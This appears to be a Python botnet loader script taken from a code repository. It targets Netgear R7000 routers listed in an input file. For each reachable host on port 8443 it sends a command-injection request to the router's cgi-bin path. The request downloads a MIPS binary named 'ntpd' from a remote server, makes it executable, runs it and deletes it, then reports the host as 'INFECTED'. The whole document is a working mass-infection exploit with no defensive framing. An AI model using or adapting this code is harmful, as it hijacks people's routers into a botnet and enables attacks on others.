Path: blob/master/Botnets/Exploits/R7000/r7000_loader.py
5038 views
#! python !#1#r7000 negear loader23import threading, random, socket, time, sys, requests, re456if len(sys.argv) < 2:7print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"8sys.exit()910server_ip = "b4.ck.do.or"11port = 844312# CONFIGURE URL LINE 33 MIPS BINARY DEFAULT: "ntpd"13class r7000(threading.Thread):14def __init__ (self, ip):15threading.Thread.__init__(self)16self.ip = str(ip).rstrip('\n')17def run(self):18try:19try:20s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)21s.settimeout(4)22s.connect((self.ip, port))23s.close()24fail = 025except:26fail = 127pass28try:29if fail:30pass31else:32r = requests.get("http://"+self.ip+":8443/cgi-bin/;cd${IFS}/var/tmp;${IFS}wget${IFS}http://"+server_ip+"/ntpd;${IFS}chmod${IFS}777${IFS}ntpd;${IFS}./ntpd;${IFS}rm${IFS}-rf${IFS}ntpd", timeout=12)33if r.status_code == 200 and "Not Found" not in r.text:34print "INFECTED "+self.ip35elif r.status_code == 404:36sys.exit()37except:38pass39except Exception as e:40pass4142ips = open(sys.argv[1], "r").readlines()43for ip in ips:44try:45t = r7000(ip)46t.start()47time.sleep(0.01)48except Exception as e:49pass5051